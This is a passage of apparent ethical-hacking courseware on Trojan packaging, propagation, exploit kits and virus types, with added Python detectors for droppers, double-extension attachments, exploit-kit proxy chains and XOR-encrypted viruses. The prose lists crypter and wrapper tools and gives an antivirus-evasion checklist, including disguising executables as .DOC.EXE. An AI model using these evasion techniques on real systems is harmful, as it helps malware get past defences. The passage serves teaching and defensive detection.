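    process creation of that same file whose parent is the writing process.

    Constructed event schema, loosely modelled on Sysmon event IDs:
      {"id": 3,  "ts": t, "pid": p, "dest": "ip:port"}              network connection
      {"id": 11, "ts": t, "pid": p, "target": "C:\\...\\x.exe"}      file created
      {"id": 1,  "ts": t, "pid": p, "ppid": parent, "image": "..."}  process created
    """
    last_remote: Dict[int, str] = {}            # pid -> most recent destination
    written: Dict[str, Tuple[int, str]] = {}    # lower(path) -> (writer pid, remote)
    findings: List[Finding] = []
    for ev in sorted(events, key=lambda e: e["ts"]):
        if ev["id"] == 3:
            last_remote[ev["pid"]] = ev["dest"]
        elif ev["id"] == 11 and is_executable(ev["target"]):
            # remember who wrote the file and whether it had just been on the network
            written[ev["target"].lower()] = (ev["pid"], last_remote.get(ev["pid"], ""))
        elif ev["id"] == 1:
            hit = written.get(ev["image"].lower())
            if hit and hit[0] == ev["ppid"]:
                writer, remote = hit
                findings.append(Finding("downloader" if remote else "dropper",
                                        writer, ev["image"], remote))
    return findings


# Constructed sample: one dropper (invoices.exe unpacks and runs svc.exe), one
# downloader (upd.exe fetched after a connection to 203.0.113.10 and then run),
# plus benign noise that must not match. Legitimate installers and updaters
# produce the same write-then-execute chain, so a real deployment allowlists them.
SAMPLE_EVENTS = [
    {"id": 1,  "ts": 1, "pid": 4100, "ppid": 900,  "image": r"C:\Users\bob\Downloads\invoices.exe"},
    {"id": 11, "ts": 2, "pid": 4100, "target": r"C:\Users\bob\AppData\Local\Temp\svc.exe"},
    {"id": 1,  "ts": 3, "pid": 4188, "ppid": 4100, "image": r"C:\Users\bob\AppData\Local\Temp\svc.exe"},
    {"id": 1,  "ts": 4, "pid": 5200, "ppid": 900,  "image": r"C:\Users\bob\Downloads\accounts.exe"},
    {"id": 3,  "ts": 5, "pid": 5200, "dest": "203.0.113.10:443"},
    {"id": 11, "ts": 6, "pid": 5200, "target": r"C:\ProgramData\upd.exe"},
    {"id": 1,  "ts": 7, "pid": 5244, "ppid": 5200, "image": r"C:\ProgramData\upd.exe"},
    {"id": 11, "ts": 8, "pid": 6000, "target": r"C:\Users\bob\Documents\report.docx"},
    {"id": 1,  "ts": 9, "pid": 6100, "ppid": 6000, "image": r"C:\Windows\System32\notepad.exe"},
]

if __name__ == "__main__":
    for finding in correlate(SAMPLE_EVENTS):
        print(finding)
```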
Employing a Wrapper
The lure of free software can trick users into installing Trojan horses. For instance, a Trojan horse might arrive in an email described as a computer calculator. When the user receives the email, the description of the calculator may lead him/her to install it. Although it may, in fact, be a default application, once the user installs the application file, the Trojan is installed in the background and it will perform other actions that are not readily apparent to the user, such as deleting files or emailing sensitive information to the attacker.
In another instance, an attacker sends a birthday greeting that will install a Trojan as the user watches, e.g., a birthday cake dancing across the screen.
Figure: Covert wrapper programs
IExpress Wizard
IExpress Wizard is a wrapper program that guides the user to create a self-extracting package that can automatically install the embedded setup files, Trojans, etc. IExpress can remove the setup files after execution and thus erase traces of Trojans. Then, it can run a program or only extract hidden files. Such embedded Trojans cannot be detected by antivirus software.
Figure 7.26: Screenshot of IExpress Wizard
Some additional wrapper tools are as follows:
- EliteWrap
- Advanced File Joiner
- Soprano
- Exe2vbs
- Kriptomatik
Employing a Crypter
A crypter is software that encrypts the original binary code of the .exe file. Attackers use crypters to hide viruses, spyware, keyloggers, RATs, etc., to make them undetectable by antivirus software. Some crypters that one can use to prevent malicious programs from being detected by security mechanisms are as follows.
BitCrypter
Source: https://www.crypter.com
BitCrypter can be used to encrypt and compress 32-bit executables and .NET apps without affecting their direct functionality. A Trojan or malicious software piece can be encrypted into legitimate software to bypass firewalls and antivirus software. BitCrypter supports a wide range of OS, from Windows XP to the latest Windows 10.
Figure 7.27: Screenshot of BitCrypter
Some additional crypter tools are as follows:
- SwayzCryptor
- Hidden Sight Crypter
- AegisCrypter v1.5
- Battleship Crypter
- Heavens Crypter
- Cypherx
Propagating and Deploying a Trojan
After creating a dropper/downloader and employing a wrapper and crypter, the attacker must transfer the package and deploy it on the target machine. The attacker can use the following techniques to propagate the Trojan package to the target machine:
- Deploy a Trojan through emails
- Deploy a Trojan through covert channels
- Deploy a Trojan through proxy servers
- Deploy a Trojan through USB/flash drives
Deploy a Trojan through Emails
A Trojan is the means by which an attacker can gain access to the victim's system. To gain control over the victim's machine, the attacker creates a Trojan server and then sends an email that lures the victim into clicking on a link provided within the email. As soon as the victim clicks the malicious link sent by the attacker, it connects directly to the Trojan server. The Trojan server then sends a Trojan to the victim system, which undergoes automatic installation on the victim's machine and infects it. As a result, the victim's device establishes a connection with the attack server unknowingly. Once the victim connects to the attacker's server, the attacker can take complete control of the victim's system and perform any action. If the victim carries out an online transaction or purchase, then the attacker can easily steal sensitive information such as the victim's credit card details and account information. In addition, the attacker can use the victim's machine to launch attacks on other systems.
The Trojan may infect computers when users open an email attachment that installs the Trojan on their computers, which might serve as a backdoor for criminals to access the system later.
Figure 7.28: Propagating and deploying a Trojan through email
Deploy a Trojan through Covert Channels
“Overt” refers to something obvious, explicit, or evident, whereas “covert” refers to something concealed, secret, or hidden.

Overt Channel | Covert Channel
A legitimate communication path within a computer system or network for the transfer of data | A channel that transfers information within a computer system or network in a way that violates the security policy
Its idle components can be exploited to create a covert channel | An example of a covert channel is the communication between a Trojan and its command-and-control center

Table 7.2: Comparison between the overt channel and covert channel
Figure 7.29: Propagating and deploying a Trojan through covert channels
Deploy a Trojan through Proxy Servers
A Trojan proxy is usually a standalone application that allows remote attackers to use the victim's computer as a proxy to connect to the target machine. Attackers compromise several computers and start using them as hidden proxy servers. Attackers have full control over the proxy victim's system and can launch attacks on other systems in the affected user's network. Attackers use this strategy to anonymously propagate and deploy the Trojan on the target computer. If the authorities detect illegal activity, the footprints lead to innocent users and not to the attackers, potentially resulting in legal hassles for the victims, who are ostensibly responsible for their network or any attacks launched from them. Thousands of machines on the Internet are infected with proxy servers. Attackers can also employ proxy server Trojans such as Linux.Proxy.10, Proxy Trojan, or Pinkslipbot (Qbot), which can automatically create proxies and be used to perform malicious activities.
Figure 7.30: Propagating and deploying a Trojan through proxy servers
Deploy a Trojan through USB/Flash Drives
An attacker can also transfer the Trojan package onto a USB drive and trick the victim into using the USB drive on the target system. Sometimes, attackers just drop a USB drive and wait for a random victim to pick it up. Once the USB drive is picked up and inserted into the target system by the innocent victim, the Trojan is propagated on the system by the drop or download method, depending on the type of packaging technique used by the attacker. After propagating to the victim's machine, the Trojan is automatically executed on the target system, thereby infecting and compromising the system and network.
Techniques for Evading Antivirus Software
Sometimes, various types of antivirus scanners are deployed in the target network, and these antivirus scanners do not allow the propagation or deployment of random or malicious packages. Hence, propagating and deploying a Trojan stealthily is one of the important tasks of an attacker. The various techniques that can be used by attackers to make malware such as Trojans, viruses, and worms undetectable by antivirus applications are listed below.
1. Break the Trojan file into multiple pieces and zip them as a single file.
2. Always write your Trojan and embed it into an application (an antivirus program fails to recognize new Trojans, as its database does not contain the proper signatures).
3. Change the Trojan's syntax:
   - Convert an EXE to VBScript
   - Change the .EXE extension to .DOC.EXE, .PPT.EXE, or .PDF.EXE (Windows hides “known extensions” by default; hence, it shows up only as .DOC, .PPT, .PDF, etc.)
4. Change the content of the Trojan using a hex editor.
5. Change the checksum and encrypt the file.
6. Never use Trojans downloaded from the web (antivirus software detects these easily).
7. Use binder and splitter tools that can change the first few bytes of the Trojan programs.
8. Perform code obfuscation or morphing. Morphing is done to prevent the antivirus program from differentiating between malicious and harmless programs.
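Item 3 above relies on Explorer hiding the last known extension and on a file name saying one thing while the bytes say another, and the downloader section earlier describes attachments posing as accounts.exe or invoices. The check below, an added example that is not the courseware's code, reproduces the display rule and flags those disguises on an attachment's name and leading bytes; the extension lists, file names and byte strings are constructed.

```python
"""
Checks for the attachment disguises listed above: a document extension in
front of the real .EXE that Explorer hides, a plain executable attachment,
or content that does not match the declared type. Added example, not the
courseware's code; filenames and byte strings are constructed.
"""
import os
from typing import List

# Extensions that Windows Explorer hides under its default
# "Hide extensions for known file types" setting (constructed subset).
KNOWN_EXTS = {".exe", ".scr", ".com", ".vbs", ".js", ".bat",
              ".doc", ".docx", ".ppt", ".pptx", ".xls", ".xlsx", ".pdf", ".txt"}
EXECUTABLE_EXTS = {".exe", ".scr", ".com", ".vbs", ".js", ".bat", ".cmd", ".pif"}
DOCUMENT_EXTS = {".doc", ".docx", ".ppt", ".pptx", ".xls", ".xlsx", ".pdf", ".txt"}

# Leading bytes that identify the real container, independent of the name.
MAGIC = [
    (b"MZ", ".exe"),                  # PE/DOS executable
    (b"%PDF", ".pdf"),
    (b"PK\x03\x04", ".docx"),         # OOXML (docx/pptx/xlsx are zip containers)
    (b"\xd0\xcf\x11\xe0", ".doc"),    # OLE2 compound file (doc/ppt/xls)
]


def extensions(name: str) -> List[str]:
    """All extension parts of a name: 'invoice.pdf.exe' -> ['.pdf', '.exe']."""
    parts = os.path.basename(name).lower().split(".")
    return ["." + p for p in parts[1:] if p]


def displayed_name(name: str) -> str:
    """What Explorer shows by default: the last known extension is dropped,
    so 'invoice.pdf.exe' is displayed as 'invoice.pdf'."""
    base = os.path.basename(name)
    root, ext = os.path.splitext(base)
    return root if ext.lower() in KNOWN_EXTS else base


def content_type(data: bytes) -> str:
    """Best-effort container type from the magic bytes ('' if unknown)."""
    for magic, ext in MAGIC:
        if data.startswith(magic):
            return ext
    return ""


def assess(name: str, data: bytes) -> List[str]:
    """Return the reasons an attachment looks disguised (empty list if none)."""
    exts = extensions(name)
    real_ext = exts[-1] if exts else ""
    reasons = []
    if real_ext in EXECUTABLE_EXTS:
        reasons.append("executable-attachment")
        if len(exts) > 1 and exts[-2] in DOCUMENT_EXTS:
            reasons.append("double-extension")      # e.g. .DOC.EXE shown as .DOC
    # A PE header behind a document name is a mismatch whatever the name says:
    # renaming a file does not change its MZ magic.
    if content_type(data) == ".exe" and real_ext not in EXECUTABLE_EXTS:
        reasons.append("content-mismatch")
    return reasons


# Constructed samples: a few header bytes stand in for whole files.
PE_STUB = b"MZ\x90\x00\x03\x00\x00\x00"
PDF_STUB = b"%PDF-1.7\n"
OLE_STUB = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"

if __name__ == "__main__":
    for fname, blob in [("invoice.pdf.exe", PE_STUB), ("accounts.exe", PE_STUB),
                        ("report.doc", PE_STUB), ("report.doc", OLE_STUB),
                        ("quote.pdf", PDF_STUB)]:
        print(f"{fname:16} shown as {displayed_name(fname):12} -> {assess(fname, blob)}")
```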
An exploit kit or crimeware toolkit is used to exploit security loopholes found in software applications such as Adobe Reader and Adobe Flash Player, by distributing malware such as spyware, viruses, Trojans, worms, bots, backdoors, buffer overflow scripts, or other payloads to the target system. Exploit kits come with pre-written exploit code. Thus, they are easy to use for an attacker who is not an IT or security expert. They also provide a user-friendly interface to track the infection statistics as well as a remote mechanism to control the compromised system. Using exploit kits, an attacker can target browsers, programs that are accessible using browsers, zero-day vulnerabilities, and exploits updated with new patches instantly. Exploit kits are used against users running insecure or outdated software applications on their systems.
Figure: General procedure for an exploit kit
The diagram above shows the general procedure for an exploit kit; the process of exploiting a machine might vary depending on the exploit kit used.
- The victim visits a legitimate website that is hosted on the compromised web server.
- The victim is redirected through various intermediary servers.
- The victim unknowingly lands on an exploit kit server hosting the exploit pack landing page.
- The exploit kit gathers information on the victim, based on which it determines the exploit and delivers it to the victim's system.
- If the exploit succeeds, a malware program is downloaded and executed on the victim's system.
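The chain above leaves a recognizable trace in a web proxy log: a request to a site the organization knows, one or more 302 hops, a landing page on a host never seen before, an exploit object (Flash, Java, Silverlight) and finally an executable download. The detector below is an added example, not the courseware's code; the log format, the log lines and the allowlist of known hosts are constructed.

```python
"""
Walk constructed proxy log lines and report clients that went through the
full exploit-kit chain: 302 hops -> unknown landing host -> exploit object
-> executable download. Added example, not the courseware's code.
"""
from collections import defaultdict
from datetime import datetime
from typing import Dict, List, Set
from urllib.parse import urlsplit

EXPLOIT_TYPES = {"application/x-shockwave-flash", "application/java-archive",
                 "application/x-silverlight-app"}
PAYLOAD_TYPES = {"application/x-msdownload", "application/octet-stream"}


def parse_line(line: str) -> Dict:
    """Constructed format: '<iso-time> <client> <method> <url> <status> <content-type>'."""
    ts, client, method, url, status, ctype = line.split()
    return {"ts": datetime.fromisoformat(ts), "client": client, "method": method,
            "host": urlsplit(url).hostname, "url": url, "status": int(status),
            "ctype": ctype}


def _fresh() -> Dict:
    return {"hops": [], "landing": None, "exploit": None, "last": None}


def find_chains(lines: List[str], known_hosts: Set[str], max_gap: int = 120) -> List[Dict]:
    """Per client, advance a small state machine over the requests in time order.
    A gap longer than max_gap seconds, or a redirect chain that ends on a known
    host, resets the state; a full chain produces one finding."""
    by_client: Dict[str, List[Dict]] = defaultdict(list)
    for rec in (parse_line(ln) for ln in lines if ln.strip()):
        by_client[rec["client"]].append(rec)

    findings = []
    for client, recs in by_client.items():
        recs.sort(key=lambda r: r["ts"])
        st = _fresh()
        for r in recs:
            if st["last"] and (r["ts"] - st["last"]).total_seconds() > max_gap:
                st = _fresh()
            st["last"] = r["ts"]
            if r["status"] == 302:
                st["hops"].append(r["host"])            # one more redirect hop
            elif st["hops"] and st["landing"] is None:
                if r["host"] in known_hosts:
                    st = _fresh()                        # ordinary redirect to a known site
                    st["last"] = r["ts"]
                else:
                    st["landing"] = r["host"]           # first unknown host after the hops
            elif st["landing"] and r["ctype"] in EXPLOIT_TYPES:
                st["exploit"] = r["url"]                 # exploit object served by the landing host
            elif st["exploit"] and r["ctype"] in PAYLOAD_TYPES:
                findings.append({"client": client, "hops": st["hops"],
                                 "landing": st["landing"], "exploit": st["exploit"],
                                 "payload": r["url"]})
                st = _fresh()
    return findings


# Constructed log: client 10.0.0.5 walks the whole chain; 10.0.0.7 follows an
# ad redirect that ends on a known shop and must not be reported.
SAMPLE_LOG = """\
2024-05-01T10:00:00 10.0.0.5 GET http://news.example/story 200 text/html
2024-05-01T10:00:01 10.0.0.5 GET http://ads.example/click 302 -
2024-05-01T10:00:02 10.0.0.5 GET http://r1-rotator.test/go 302 -
2024-05-01T10:00:03 10.0.0.5 GET http://k3mz.test/index.php 200 text/html
2024-05-01T10:00:04 10.0.0.5 GET http://k3mz.test/x.swf 200 application/x-shockwave-flash
2024-05-01T10:00:06 10.0.0.5 GET http://k3mz.test/u.exe 200 application/x-msdownload
2024-05-01T10:05:00 10.0.0.7 GET http://news.example/story 200 text/html
2024-05-01T10:05:01 10.0.0.7 GET http://ads.example/click 302 -
2024-05-01T10:05:02 10.0.0.7 GET http://shop.example/deal 200 text/html
"""
KNOWN_HOSTS = {"news.example", "ads.example", "shop.example"}

if __name__ == "__main__":
    for hit in find_chains(SAMPLE_LOG.splitlines(), KNOWN_HOSTS):
        print(hit)
```

In practice the known-host set is the organization's history of previously seen domains, and a hit is worth acting on because the landing host, the exploit object and the payload URL all arrive in one record.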
Exploit Kits
RIG Exploit Kit
The RIG exploit kit is one of the most popular exploit kits in recent years, with its wide range of malware distribution. RIG EK was first discovered in 2014. It is efficient in distributing many exploits. RIG EK was used successfully by attackers in distributing Cryptobit, CryptoLuck, CryptoShield, CryptoDefense, Sage, Spora, Revenge, PyCL, Matrix, Philadelphia, and Princess ransomware. It was also involved in distributing LatentBot, Pony, and Ramnit Trojans. Furthermore, RIG was involved in delivering the famous banking Trojan Zeus. The latest version of the RIG exploit kit takes advantage of outdated versions of applications such as Flash, Java, Silverlight, Internet Explorer, or Microsoft Edge to distribute the Cerber ransomware.
Features:
- Landing page based on a standard 302 redirect
- Domain auto-rotator to avoid blacklisting and detection
- FUD (entirely undetectable) exploits
- Combination of different web technologies, such as DoSWF, JavaScript, Flash, and VBScript, to obfuscate the attack
The RIG exploit kit is supported for different browsers as well as the following CVEs:
- CVE-2018-4878: Adobe Flash Player Use-After-Free Vulnerability
- CVE-2018-8174: Windows VBScript Engine Remote Code Execution Vulnerability
- CVE-2013-2551: Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability
- CVE-2014-0322: Microsoft Internet Explorer Use-After-Free Remote Code Execution Vulnerability
- CVE-2014-0497: Adobe Flash Player Remote Code Execution Vulnerability
- CVE-2013-0074: Microsoft Silverlight Double Dereference Remote Code Execution Vulnerability
- CVE-2013-2465: Oracle Java SE Memory Corruption Vulnerability
- CVE-2012-0507: Oracle Java SE Remote Java Runtime Environment Code Execution Vulnerability
- CVE-2014-6332: Windows OLE Automation Array Remote Code Execution Vulnerability
- CVE-2015-2419: JScript9 Memory Corruption Vulnerability
- CVE-2016-0189: Scripting Engine Memory Corruption Vulnerability
- CVE-2015-8651: Integer Overflow Vulnerability in Adobe Flash Player
Figure 7.3: Screenshot of RIG Exploit Kit
Some additional exploit kits that attackers can use to propagate and deploy Trojans are as follows:
- Magnitude
- Angler
- Neutrino
- Terror
- Sundown
Module Flow
Furthermore, it highlights different types of viruses, categorized by their origin, techniques used to infect target systems, the types of files they infect, where they hide, the sort of damage they cause, the type of OS they work on, and so on. It also deals with computer worms, discusses the difference between worms and viruses, and explores worm makers.
Introduction to Viruses
Viruses are the scourge of modern computing. Computer viruses have the potential to wreak havoc on both business and personal computers. The lifetime of a virus depends on its ability to reproduce itself. Therefore, attackers design every virus code such that the virus replicates itself n times.
A computer virus is a self-replicating program that produces its code by attaching copies of itself to other executable code and operates without the knowledge or consent of the user. Like a biological virus, a computer virus is contagious and can contaminate other files; however, viruses can infect external machines only with the assistance of computer users.
A virus:
- Infects other programs
- Transforms itself
- Encrypts itself
- Alters data
- Corrupts files and programs
- Replicates itself
Purpose of Creating Viruses
Attackers create viruses with disreputable motives. Criminals create viruses to destroy a company's data, as an act of vandalism, or to destroy a company's products; however, in some cases, viruses aid the system. An attacker creates a virus for the following purposes:
- Inflict damage on competitors
- Realize financial benefits
- Vandalize intellectual property
- Play pranks
- Conduct research
- Engage in cyber-terrorism
- Distribute political messages
- Damage network or computers
- Gain remote access to the victim's computer
Indications of Virus Attack
Indications of virus attacks arise from abnormal activities. Such activities reflect the nature of a virus by interrupting the regular flow of a process or a program. However, not all bugs created contribute toward attacking the system; they may merely be false positives. For example, if the system runs slower than usual, one may assume that a virus has infected the system; however, the actual reason might be program overload.
An effective virus tends to multiply rapidly and may infect some machines in a short period. Viruses can infect files on the system, and when such files are transferred, they can infect machines of other users who receive them. A virus can also use file servers to infect files. When a virus infects a computer, the victim or user will be able to identify some indications of the presence of virus infection.
Some indications of computer virus infection are as follows:
- Processes
- Computer beeps with no display
- Drive label changes and OS does not load
- Constant antivirus alerts
- Computer freezes frequently or encounters an error such as BSOD
- Files and folders are missing
- Suspicious hard drive activity
- Browser window “freezes”
- Lack of storage space
- Unwanted advertisements and pop-up windows
Stages of Virus Lifecycle
The virus lifecycle includes the following six stages from origin to elimination.
1. Design: Development of virus code using programming languages or construction kits.
2. Replication: The virus replicates itself within the target system and then spreads for a period.
3. Launch: The virus is activated when the user performs specific actions such as running an infected program.
4. Detection: The virus is identified as a threat infecting target systems.
5. Incorporation: Antivirus software developers assimilate defenses against the virus.
6. Execution of the damage routine: Users install antivirus updates and eliminate the virus threats.
Working of Viruses
Viruses can attack a target host's system using a variety of methods. They can attach themselves to programs and transmit themselves to other programs through specific events. Viruses need such events to take place, as they cannot self-start, infect hardware, or transmit themselves using non-executable files. “Trigger” and “direct attack” events can cause a virus to activate and infect the target system when the user triggers attachments received through email, websites, malicious advertisements, flashcards, pop-ups, and so on. The virus can then attack the system's built-in programs, antivirus software, data files, system startup settings, etc. Viruses have two phases: the infection phase and the attack phase.
Infection Phase
Programs modified by a virus infection can enable virus functionalities to run on the system. The virus infects the target system after the execution of infected programs, because the program code leads to the virus code; the virus is triggered and becomes active upon the program's execution.
The two most important factors of the infection phase of a virus are as follows:
- Method of infection
- Method of spreading
A virus infects a system in the following sequence:
- The virus loads itself into memory and checks for an executable on the disk.
- The virus appends malicious code to a legitimate program without the permission or knowledge of the user.
- The user is unaware of the replacement and launches the infected program.
- The execution of the infected program also infects other programs in the system.
- The above cycle continues until the user realizes that there is an anomaly in the system.
Apparently, the user unknowingly triggers and executes the virus for it to function. There are many ways to execute programs while the computer is running. For example, if the user installs any software tool, the setup program calls various built-in sub-programs during extraction. If a virus program already exists, it can be activated with this type of execution, and the virus can also infect additional setup programs.
Specific viruses infect in different ways. The most popular methods by which a virus spreads are as follows:
- Infected files: A virus can infect a variety of files.
- File-sharing services: A virus can take advantage of file servers to infect files. When unsuspecting users open the infected files, their machines also become infected.
- DVDs and other storage media: When infected storage media such as DVDs, flash drives, and portable hard disks are inserted into a clean system, the system gets infected.
- Malicious attachments and downloads: A virus spreads if a malicious attachment sent via email is opened or when apps are downloaded from untrusted sources.
Figure: .EXE file before infection (file header, file) and after infection (file header, jump, virus code, infected file)
Attack Phase
Once viruses spread throughout the target system, they start corrupting the files and programs of the host system. Some viruses can trigger and corrupt the host system only after the triggering event is activated. Some viruses have bugs that replicate themselves and perform activities such as deleting files and increasing session time. Viruses corrupt their targets only after spreading as intended by their developers. Most viruses that attack target systems perform the following actions:
- Delete files and alter the content of data files, slowing down the system
- Perform tasks not related to applications, such as playing music and creating animations
Figure 7.35: Attack Phase (unfragmented files A and B before the attack; file fragmented due to the virus attack)
The figure shows two files, A and B. Before the attack, the two files are located one after the other in an orderly manner. Once a virus code infects the file, it alters the position of the files placed consecutively, leading to inaccuracy in file allocations and causing the system to slow down as the user tries to retrieve the files.
In the attack phase:
- Some viruses execute upon triggering specific events
- Some viruses execute and corrupt via built-in bug programs after being stored in the host's memory
- The latest and most advanced viruses conceal their presence, attacking only after thoroughly spreading through the host.
How does a Computer Get Infected by Viruses?
- Pop-ups: When the user clicks any suspicious pop-up by mistake, the virus hidden behind the pop-up enters the system. Whenever the user turns on the system, the installed virus code will run in the background.
- Removable media: When a healthy system is associated with virus-infected removable media (e.g., CD/DVD, USB drive, card reader), the virus spreads to the system.
- Network access: Connecting to an untrusted Wi-Fi network, leaving Bluetooth ON, or permitting a file sharing program that is accessed openly will allow a virus to take over the device.
- Backup and restore: Taking a backup of an infected file and restoring it to a system infects the system again with the same virus.
- Malicious online ads: Attackers post malicious online ads by embedding malicious code in the ads, also known as malvertising. Once users click these ads, their computers get infected.
- Social media: People tend to click on social media sites, including malicious links shared by their contacts, which can infect their systems.
Types of Viruses
Computer viruses are malicious software programs written by attackers to gain unauthorized access to a target system. Thus, they compromise the security of the system as well as its performance. For any virus to corrupt a system, it has to first associate its code with executable code. It is important to understand how viruses:
- Add themselves to the target host's code
- Choose to act upon the target system.
Viruses are categorized according to their functioning and targets. Some of the most common types of computer viruses that adversely affect the security of systems are listed below:
1. System or Boot Sector Virus
2. File Virus
3. Multipartite Virus
4. Macro Virus
5. Cluster Virus
6. Encryption Virus
7. Stealth/Tunneling Virus
8. Sparse Infector Virus
9. Polymorphic Virus
10. Metamorphic Virus
11. File Overwriting or Cavity Virus
12. Companion Virus/Camouflage Virus
13. Shell Virus
14. File Extension Virus
15. FAT Virus
16. Logic Bomb Virus
17. Web Scripting Virus
18. Email Virus
19. Armored Virus
20. Add-on Virus
21. Intrusive Virus
22. Direct Action or Transient Virus
23. Terminate and Stay Resident Virus (TSR)
System or Boot Sector Viruses
The most common targets for a virus are the system sectors, which include the master boot record (MBR) and the DOS boot record system sectors. An OS executes code in these areas while booting. Every disk has some sort of system sector. MBRs are the most virus-prone zones because if the MBR is corrupted, all data will be lost. The DOS boot sector also executes during system booting. This is a crucial point of attack for viruses.
The system sector consists of only 512 bytes of disk space. Therefore, system sector viruses conceal their code in some other disk space. The primary carriers of system or boot sector viruses are email attachments and removable media (USB drives). Such viruses reside in memory. Some sector viruses also spread through infected files; these are known as multipartite viruses.
A boot sector virus moves the MBR to another location on the hard disk and copies itself to the original location of the MBR. When the system boots, first, the virus code executes and then passes control to the original MBR.
Figure 7.36: Working of system and boot sector virus (before infection, after infection, and after virus removal)
System sector viruses create the illusion that there is no virus on the system. One way to deal with this virus is to avoid the use of the Windows OS and switch to Linux or Mac, because Windows is more prone to such attacks. Linux and Macintosh have built-in safeguards against these viruses. The other approach for protection is to periodically perform antivirus checks.
File Viruses
File viruses infect files executed or interpreted in the system, such as COM, EXE, SYS, OVL, OBJ, PRG, MNU, and BAT files. File viruses can be direct-action (non-resident) or memory-resident.
File viruses insert their code into the original file and infect executable files. Such viruses are numerous, albeit rare. They infect in a variety of ways and are found in numerous file types. The most common type of file virus operates by identifying the file type it can infect most easily, such as files with names ending in .COM or .EXE. During program execution, the virus executes along with program files to infect more files. Overwriting a virus is not easy, as the overwritten programs no longer function properly. These viruses tend to be found immediately. Before inserting their code into a program, some file viruses save the original instructions and allow the original program to execute, so that everything appears normal.
Figure 7.37: Working of file virus
Multipartite Viruses
A multipartite virus (also known as a multipart virus or hybrid virus) combines the approach of file infectors and boot record infectors and attempts to simultaneously attack both the boot sector and the executable or program files. When the virus infects the boot sector, it will, in turn, affect the system files and vice versa. This type of virus re-infects a system repeatedly if it is not rooted out entirely from the target machine. Some examples of multipartite viruses include Invader, Flip, and Tequila.
Macro Viruses
Figure 7.38: Working of a macro virus (infects macro-enabled documents)
Cluster Viruses
Cluster viruses infect files without changing the file or planting additional files. They save the virus code to the hard drive and overwrite the pointer in the directory entry, directing the disk read point to the virus code instead of the actual program. Even though the changes in the directory entry may affect all the programs, only one copy of the virus exists on the disk.
A cluster virus, e.g., Dir-2, first launches itself when any program starts on the computer system, and control is then passed to the actual program. This virus infection leads to severe problems if the victim does not know its exact location. If it infects memory, it controls access to the directory structure on the disk.
If the victim boots from a clean floppy disk and then runs a utility such as CHKDSK, the utility reports a serious problem with the cross-linked file on the disk. Such utilities usually offer to correct the problem. If the offer is accepted, the virus infects all the executable files and results in the loss of original content, or all files might appear to be of the same size.
Stealth Viruses/Tunneling Viruses
These viruses try to hide from antivirus programs by actively altering and corrupting the service call interrupts while running. The virus code replaces the requests to perform operations with respect to these service call interrupts. These viruses state false information to hide their presence from antivirus programs. For example, a stealth virus hides the operations that it modified and gives false representations. Thus, it takes over portions of the target system and hides its virus code.
A stealth virus hides from antivirus software by hiding the size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the original infected file with the uninfected file that is stored on the hard drive.
In addition, a stealth virus hides the modifications performed by it. It takes control of the system's functions that read files or system sectors. When another program requests information that has already been modified by the virus, the stealth virus reports the original information to the requesting program instead. This virus also resides in memory. To avoid detection, these viruses always take over system functions and use them to hide their presence.
One of the carriers of stealth viruses is the rootkit. Installing a rootkit results in such a virus attack because a Trojan installs the rootkit and is thus capable of hiding any malware.
Figure 7.39: Working of stealth/tunneling virus
Virus Removal
- Always perform a cold boot (boot from a write-protected CD or DVD)
- Never use DOS commands such as FDISK to fix the virus
- Use antivirus software
Encryption Viruses
Encryption viruses or cryptolocker viruses penetrate the target system via freeware, shareware, codecs, fake advertisements, torrents, email spam, and so on. This type of virus consists of an encrypted copy of the virus and a decryption module. The decryption module remains constant, whereas the encryption makes use of different keys.
An encryption key consists of a decryption module and an encrypted copy of the code, which enciphers the virus. When the attacker injects the virus into the target machine, the decryptor will first execute and decrypt the virus body. Then, the virus body executes and replicates or becomes resident in the target machine. The replication process is successfully accomplished using the encryptor. Each virus-infected file uses a different key for encryption. These viruses employ XOR on each byte with a randomized key; the decryption technique employed is the same XOR of each byte with that randomized key, which is generated and saved by the root virus.
Encryption viruses block access to target machines or provide victims with limited access to the system. They use encryption to hide from virus scanners. The virus scanner cannot detect the encryption virus using signatures, but it can detect the decrypting module.
Figure 7.40: Working of encryption virus (one virus code, encrypted with key 1, key 2, and key 3)
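The scanner-side consequence of the model above, as an added example written for this edit (not EC-Council courseware): constructed infected-file images share one constant decryptor stub but use a different XOR key each time; a signature of the plaintext body never matches them, a signature of the constant decryption module matches every variant, and an emulation-style check that replays the decryptor and scans the recovered plaintext matches as well. The stub layout, STUB_MAGIC, and the sample body are hypothetical.

```python
import secrets

# Constructed stand-in for a virus body: an arbitrary byte string, not real code.
SAMPLE_BODY = b"SAMPLE-VIRUS-BODY: replicate; stay resident; infect next host"
# Static signature a scanner would extract from the plaintext body.
BODY_SIGNATURE = b"SAMPLE-VIRUS-BODY"

# Hypothetical layout of the constant decryption module (the "decryptor"):
#   STUB_MAGIC (4 bytes) | key (1 byte) | body length (2 bytes, big-endian) | XOR-encrypted body
# Only the key and the ciphertext change from one infected file to the next.
STUB_MAGIC = b"DCR1"


def xor_bytes(data: bytes, key: int) -> bytes:
    """XOR every byte with a one-byte key (the text's 'XOR on each byte with a randomized key')."""
    return bytes(b ^ key for b in data)


def build_infected_image(key: int, body: bytes = SAMPLE_BODY) -> bytes:
    """Constructed infected-file image: constant decryptor stub + per-file key + encrypted body."""
    if not 1 <= key <= 255:
        raise ValueError("key must be a non-zero byte; key 0 would leave the body in clear")
    return STUB_MAGIC + bytes([key]) + len(body).to_bytes(2, "big") + xor_bytes(body, key)


def random_infected_image() -> bytes:
    """Each 'infection' draws a fresh key, so the encrypted body differs every time."""
    return build_infected_image(secrets.choice(range(1, 256)))


# --- scanner side -------------------------------------------------------------

def body_signature_scan(blob: bytes) -> bool:
    """Plain signature of the body: fails, because the body is never stored in clear."""
    return BODY_SIGNATURE in blob


def decryptor_signature_scan(blob: bytes) -> bool:
    """Signature of the constant decryption module: the part a scanner CAN match."""
    return STUB_MAGIC in blob


def emulate_and_scan(blob: bytes) -> bool:
    """Do what the decryptor would do (read key and length, decrypt) and scan the plaintext.

    This matches the body itself, whatever key was used for this particular file.
    """
    start = blob.find(STUB_MAGIC)
    if start < 0 or len(blob) < start + 7:
        return False
    key = blob[start + 4]
    length = int.from_bytes(blob[start + 5:start + 7], "big")
    ciphertext = blob[start + 7:start + 7 + length]
    if len(ciphertext) != length:
        return False  # truncated image: refuse to guess
    return BODY_SIGNATURE in xor_bytes(ciphertext, key)


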